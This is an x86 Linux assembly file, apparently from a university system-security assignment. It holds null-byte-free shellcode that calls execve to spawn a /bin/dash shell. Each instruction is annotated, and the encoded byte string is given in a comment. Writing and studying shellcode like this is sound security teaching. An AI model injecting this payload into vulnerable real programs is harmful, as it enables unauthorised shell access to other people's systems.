Systemsicherheit/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm

26 lines
1.9 KiB
NASM
Raw Normal View History

; SHELLCODE: "\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
section .text
global _start
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; https://rayoflightz.github.io/shellcoding/linux/x86/2018/11/15/Shellcoding-for-linux-on-x86.html ;
; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit ;
; https://man7.org/linux/man-pages/man2/execve.2.html ;
; https://www.ascii-code.com/ ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
_start:
xor eax, eax ; set eax to NULL without terminating the shellcode later
push eax ; push a null byte onto the stack as the string terminator
push 0x68736164 ; push the ASCII values for 'dash' onto the stack in reverse order (due to little endian)
push 0x2f2f2f2f ; push the ASCII values for '////' onto the stack in reverse order "
push 0x6e69622f ; push the ASCII values for '/bin' onto the stack in reverse order "
; only multiples of wordsize (here 4 byte) can be pushed onto stack
; therefore four / in the second push
mov ebx, esp ; set ebx to the address of the '/bin////dash' string (top of the stack)
mov ecx, eax ; set ecx to NULL (=> char *const _Nullable argv[] is NULL)
mov edx, eax ; set edx to NULL (=> char *const _Nullable envp[] is NULL)
mov al, 0xb ; load the syscall number for execve (11) into lowest 8 bits of eax to prevent null bytes in shellcode
int 0x80 ; trigger the kernel interrupt to execute the syscall
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;